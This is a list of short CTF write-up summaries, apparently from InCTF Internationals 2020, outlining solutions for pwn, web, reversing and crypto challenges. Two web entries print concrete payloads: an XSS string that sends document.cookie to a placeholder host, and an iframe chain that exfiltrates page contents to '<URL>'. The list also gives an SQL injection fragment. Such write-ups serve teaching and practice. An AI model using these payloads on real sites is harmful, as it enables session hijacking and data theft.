tl;dr

• Carefully arranging structs on stack so as to overwrite saved rip , without corrupting the stack canary.
• Leak libc with puts and execute a ret2libc to get shell

tl;dr

• Overwrite mmap_threshold with null and trim top chunk size.
• Null out last 2 bytes of stdin’s _IO_buf_base and brute force to get allocation on stdin.
• Overwrite one of the jump tables with win function to get shell.

tl;dr

• Part-1: .bzr file retrival using any tool
• Part-1: exploiting ssrf via ffmpeg to read /flag file to a video and download it before it gets deleted

tl;dr

• Payload: a<math>b<xss style=display:block>c<style>d<a title="</style>"><img src onerror=document.location='https://your_url/?'.concat(document.cookie)>">e

tl;dr

• SQLi - lcase('inKypinKy')id from dual
• Creating User - header("location:http://web/user.php?session=1111-22222-1234&sub=submit");
• Retrieving Flag - header("location:http://web/flag.php?session=<iframe id="a" src="http://web/flag.php?session=1111-22222-1234&sub=submit" onload=window.location="<URL>?"+btoa(document.getElementById('a').contentWindow.document.body.innerText)>&sub=submit")

tl;dr

• Execute shellcode on parent and write to child’s memory using /proc/<pid of child>/mem
• Overwrite return address of child with execve shellcode and pop shell.

tl;dr

• Challenge involves Reversing, Web, and Crypto
• Reverse the binary to get the endpoints
• Trigger the XSS bug in the website and get admin cookie
• Use Hash Length extension attack to get authenticated as admin and get the flag

tl;dr

• Challenge is a Nintendo GameBoy ROM image.
• Reverse the ROM and figure out the implementation
• Analyze the calling function’s checks to find the path along which we must move.

tl;dr

• Extract higher bits of secret using input manipulation
• Extract lower bits of secret using the highers bits and input manipulation

A brief write-up detailing solutions of Reversing Challenges from InCTF Internationals 2020